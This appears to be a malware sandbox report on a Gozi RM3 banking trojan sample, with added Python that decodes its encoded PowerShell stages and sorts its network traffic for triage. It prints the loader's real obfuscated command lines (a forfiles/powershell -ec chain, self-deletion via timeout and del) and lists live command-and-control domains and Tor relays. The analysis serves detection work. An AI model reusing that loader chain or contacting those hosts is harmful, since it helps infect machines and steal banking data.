C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE7D1.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCE7D0.tmp"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\dlbyujxt.cmdline"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE88C.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCE88B.tmp"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C timeout /t 5 && del "C:\USERS\ADMIN\APPDATA\LOCAL\TEMP\RESTR.EXE"

C:\Windows\system32\timeout.exe

timeout /t 5
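The process tree above runs cmd.exe, then forfiles, then cmd again, then powershell, and every PowerShell payload is passed with -EncodedCommand (-ec / -E), which is base64 over UTF-16LE text rather than UTF-8. The forfiles mask `po*l.e*e` searched under System32 with /s resolves to powershell.exe without that name ever appearing in the parent command line (the child cmd.exe above confirms the match: it runs System32\WindowsPowerShell\v1.0\powershell.exe). The final `timeout /t 5 && del ...RESTR.EXE` is what the "Deletes itself" and "Delays execution with timeout.exe" tags refer to. The Python below is an added worked example, not part of the sandbox report: it decodes the three encoded commands exactly as they appear on this page and checks which file names the forfiles mask selects. The first stage decodes to an Invoke-Expression of a registry value under HKCU (so the next stage lives in the registry, which the report does not dump); the two -E children decode to quoted script fragments (a base64 decoder and an ASCII decoder). The regex, the function names, and the use of fnmatch to stand in for cmd's wildcard matcher are this example's own assumptions.

```python
"""Decode the encoded PowerShell stages and the forfiles mask from the
process tree above. Added worked example; not part of the sandbox report."""
from __future__ import annotations

import base64
import fnmatch
import re

# Command lines copied verbatim from the Processes section of this report.
CMDLINES = [
    # stage 0: cmd.exe locates powershell.exe via forfiles without naming it
    r'"C:\Windows\System32\cmd.exe" /c start /min forfiles /c "cmd /k @path -ec '
    r'aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAUwBlAGMAdQByAGkAdAB5AGMAYQBjAGgAZQAnACkALgBMAA== & exit" '
    r'/p C:\Windows\system32 /s /m po*l.e*e',
    # stage 1: children spawned by the first powershell.exe (PID 1796)
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E '
    r'JwBwAGEAcgBhAG0AKAAkAG8AdgB0AHMAbAB5ACkAOwBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABvAHYAdABzAGwAeQApACcA',
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E '
    r'JwBwAGEAcgBhAG0AKAAkAHAAYgBmAG0AYwBnAHQAcwB1AGYAbQApADsAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAHAAYgBmAG0AYwBnAHQAcwB1AGYAbQApACcA',
]

# The /m mask from the forfiles command line above.
FORFILES_MASK = "po*l.e*e"

# powershell.exe accepts -e, -ec, -enc and -EncodedCommand, case-insensitively.
# The argument is base64 of the script text encoded as UTF-16LE.
ENC_FLAG = re.compile(r"(?i)(?<!\S)-e(?:c|nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]+)")


def decode_encoded_command(b64: str) -> str:
    """Turn one -EncodedCommand argument back into PowerShell source."""
    raw = base64.b64decode(b64, validate=True)
    return raw.decode("utf-16-le")


def extract_encoded_commands(cmdline: str) -> list[str]:
    """Find every encoded-command argument in a command line and decode it."""
    return [decode_encoded_command(m.group(1)) for m in ENC_FLAG.finditer(cmdline)]


def matches_forfiles_mask(filename: str, mask: str) -> bool:
    """Approximate forfiles /m matching with fnmatch (assumption: for this
    mask the two wildcard dialects agree). Windows compares case-insensitively."""
    return fnmatch.fnmatchcase(filename.lower(), mask.lower())


if __name__ == "__main__":
    for i, cmd in enumerate(CMDLINES):
        for decoded in extract_encoded_commands(cmd):
            print(f"stage {i}: {decoded}")
    for name in ("powershell.exe", "powershell_ise.exe", "cmd.exe"):
        print(f"{name:20} matches {FORFILES_MASK}: {matches_forfiles_mask(name, FORFILES_MASK)}")
```

Running this prints the decoded stages; the same decoder works on any process-creation log that captures the full command line, which is why `-e`/`-ec` followed by a long base64 token is a reliable place to start triage of a PowerShell loader.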

Network

Country Destination Domain Proto
US 8.8.8.8:53 gogojoob.xyz udp
NL 194.104.136.213:443 gogojoob.xyz tcp
NL 194.104.136.213:443 gogojoob.xyz tcp
NL 194.104.136.213:443 gogojoob.xyz tcp
NL 45.58.156.76:443 N/A tcp
NL 45.137.184.31:80 45.137.184.31 tcp
US 209.141.45.189:80 209.141.45.189 tcp
CA 158.69.205.247:9030 158.69.205.247 tcp
US 199.249.230.185:80 199.249.230.185 tcp
NL 50.7.178.34:80 N/A tcp
DE 159.69.207.20:80 159.69.207.20 tcp
RO 89.34.27.237:9030 89.34.27.237 tcp
NL 45.137.184.31:80 45.137.184.31 tcp
VN 125.212.217.197:80 125.212.217.197 tcp
DE 159.69.207.20:80 159.69.207.20 tcp
US 74.91.21.2:80 74.91.21.2 tcp
US 8.8.8.8:53 unavas.xyz udp
US 8.8.8.8:53 microsoft.com udp
NL 91.242.229.120:443 unavas.xyz tcp
US 64.44.51.37:80 64.44.51.37 tcp
VN 125.212.217.197:80 125.212.217.197 tcp
US 209.141.45.189:80 209.141.45.189 tcp
JP 172.104.79.222:80 172.104.79.222 tcp
DE 5.9.98.43:80 5.9.98.43 tcp
IN 159.89.174.9:80 159.89.174.9 tcp
RO 89.34.27.237:9030 89.34.27.237 tcp
US 185.220.103.112:80 185.220.103.112 tcp
US 199.249.230.168:80 199.249.230.168 tcp
SE 193.189.100.200:80 193.189.100.200 tcp
DE 90.186.84.208:8080 90.186.84.208 tcp
NL 5.255.102.5:9030 5.255.102.5 tcp
ZA 160.119.249.223:80 160.119.249.223 tcp
EG 41.215.241.146:80 41.215.241.146 tcp
US 172.104.208.190:80 172.104.208.190 tcp
US 8.8.8.8:53 curlmyip.net udp
FI 135.181.84.242:80 curlmyip.net tcp
NL 91.242.229.120:443 unavas.xyz tcp
US 199.249.230.70:80 199.249.230.70 tcp
US 172.104.208.190:80 172.104.208.190 tcp
DE 78.47.226.12:80 78.47.226.12 tcp
US 199.249.230.106:80 N/A tcp
ID 195.123.237.137:80 N/A tcp
N/A 92.243.29.88:80 N/A tcp
N/A 46.105.143.215:80 N/A tcp
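The network table mixes three things worth separating when reading it: DNS lookups via 8.8.8.8 for gogojoob.xyz, unavas.xyz, curlmyip.net (an external-IP check) and microsoft.com; TLS connections to the two .xyz hosts; and a long run of connections to bare IP addresses in a dozen countries on ports 80, 8080 and 9030 with no preceding DNS query. 9030 is Tor's default directory port, and that pattern of direct-to-IP fetches is consistent with the "Uses Tor communications" tag. The Python below is an added worked example, not part of the sandbox report: it parses the report's rows (the Domain column is sometimes missing or N/A, so rows have three or four fields) and buckets them. Treating every port-9030 hit as a Tor directory fetch is a heuristic of this example, and the subset of rows embedded is copied from the table above.

```python
"""Triage the Network table of this report: separate DNS lookups, named
hosts, Tor directory-port hits and direct-to-IP connections.
Added worked example; not part of the sandbox report."""

# Rows copied from the report's Network table (a subset). The report prints
# either 3 fields (Country Destination Proto) or 4 (Country Destination Domain Proto),
# and uses N/A where a column has no value.
NETWORK_ROWS = """\
US 8.8.8.8:53 gogojoob.xyz udp
NL 194.104.136.213:443 gogojoob.xyz tcp
NL 45.58.156.76:443 tcp
NL 45.137.184.31:80 45.137.184.31 tcp
CA 158.69.205.247:9030 158.69.205.247 tcp
RO 89.34.27.237:9030 89.34.27.237 tcp
US 8.8.8.8:53 unavas.xyz udp
NL 91.242.229.120:443 unavas.xyz tcp
NL 5.255.102.5:9030 5.255.102.5 tcp
US 8.8.8.8:53 curlmyip.net udp
FI 135.181.84.242:80 curlmyip.net tcp
DE 90.186.84.208:8080 90.186.84.208 tcp
N/A 92.243.29.88:80 tcp
"""

# 9030 is Tor's default DirPort. Classifying a hit on it as a directory
# fetch is this example's heuristic (assumption), not a per-row fact from the report.
TOR_DIRPORT = 9030


def parse_row(line: str) -> dict:
    """Parse one table row; a missing or N/A Domain column becomes None."""
    parts = line.split()
    if len(parts) == 4:
        country, dest, domain, proto = parts
    elif len(parts) == 3:
        country, dest, proto = parts
        domain = None
    else:
        raise ValueError(f"unexpected row: {line!r}")
    if domain == "N/A":
        domain = None
    ip, port = dest.rsplit(":", 1)
    return {"country": country, "ip": ip, "port": int(port),
            "domain": domain, "proto": proto}


def summarize(table: str) -> dict:
    """Bucket rows into DNS queries, Tor DirPort hits, named hosts and bare-IP connections."""
    rows = [parse_row(l) for l in table.splitlines() if l.strip()]
    out = {"dns_queries": [], "tor_dirport_ips": [], "named_hosts": [], "direct_ip": []}
    for r in rows:
        if r["proto"] == "udp" and r["port"] == 53:
            out["dns_queries"].append(r["domain"])
        elif r["port"] == TOR_DIRPORT:
            out["tor_dirport_ips"].append(r["ip"])
        elif r["domain"] and r["domain"] != r["ip"]:
            out["named_hosts"].append((r["domain"], r["ip"], r["port"]))
        else:
            # bare IP, or a Domain column that merely repeats the IP: no DNS preceded it
            out["direct_ip"].append((r["ip"], r["port"]))
    # keep first-seen order, drop repeated entries
    return {k: list(dict.fromkeys(v)) for k, v in out.items()}


if __name__ == "__main__":
    for bucket, items in summarize(NETWORK_ROWS).items():
        print(f"{bucket}: {items}")
```

The split matters for response: the two .xyz hosts and their IPs are the indicators worth blocking and hunting for, while the bare-IP set is a snapshot of Tor relays at detonation time and will not reproduce on a second run.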

Files

memory/580-54-0x00000000004EE000-0x00000000004F9000-memory.dmp

memory/580-55-0x0000000075561000-0x0000000075563000-memory.dmp

memory/580-56-0x0000000000230000-0x0000000000240000-memory.dmp

memory/580-62-0x00000000004EE000-0x00000000004F9000-memory.dmp

memory/580-63-0x0000000000220000-0x000000000022C000-memory.dmp

memory/580-64-0x0000000001000000-0x000000000106F000-memory.dmp


Analysis: behavioral2

Detonation Overview

Submitted

2022-03-15 07:24

Reported

2022-03-15 07:27

Platform

win10v2004-20220310-en

Max time kernel

138s

Max time network

142s

Command Line

C:\Windows\Explorer.EXE

Signatures

Gozi RM3

banker trojan gozi_rm3

Uses Tor communications

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\Restr.exe

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\IESettingSync C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000009521245b68481d44b7c4b8cf21a171b600000000020000000000106600000001000020000000a5e7366ad98a250a622ef78dbb43b871080b4c72ca92a2653e990cc1eacce429000000000e8000000002000020000000cdab38de3e5895af19090244b9293a1f89573a58ec77cbf692a49c30503c1526c0000000f07412935dbfafce97f7f6290e569d60ccd2f3bfb0289d908a315016c9928bc4687967c4d9e10eadfd7bbc02cf069c38dcfca9bc6f9bfc69c86b52268e4202c39e2a0bb0a29324b4668eb9c750c73e51b4b33a854db31a5c9bf30f0b3ed5e543b23c004cd4f113de65c345b13cc004ccf52650a072a1e49c6378715b711271680721a6ecc0a3be84c06dd9e33d07b899a20bbaa34a84c9dfabc1372c54ce84e2d21f08ec27d400bfcca6b0d13262ec56d53e553dec2c1af0203ecd63c74f480140000000e14f522f5869c2b466d4d27af468692729d4aae77f4117cb26a8d77b7c6f3eafde0e8e2ba50cdfe99a1b457725ea00598a3190b0d0d5878c69af3996ca6fa8bf C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\IESettingSync C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff5800000000000000de04000065020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\VersionManager C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000009521245b68481d44b7c4b8cf21a171b600000000020000000000106600000001000020000000ba210254f78f03869d06858b7b3e752cfd6c0719a777410e00ae45cde5c14a2c000000000e8000000002000020000000b2cf1e0f23837bbd61937dd8310e2468a46b0cf930daed9128d94cef782d505b200000002715ce0ec2919d1a0747c412d4eb2dc340a7178722e55bebedd5a2c6c314ffbc40000000949f791712220887bad279731de3cd466923e2a6b2e4097a1e06b406761c1f6d8e6899ff7f389a0e7c51d86d9bca7a41783add68f856048c246d38b77244c78a C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\IESettingSync C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff720000001a000000f80400007f020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff4e00000000000000d404000065020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\IESettingSync C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\IESettingSync C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "887910015" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "887910015" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\IESettingSync C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\IESettingSync C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\IESettingSync C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{6050D300-A439-11EC-B9E2-DEBD9A810609} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Restr.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4760 wrote to memory of 4636 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4760 wrote to memory of 4636 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4760 wrote to memory of 4636 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4760 wrote to memory of 2500 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
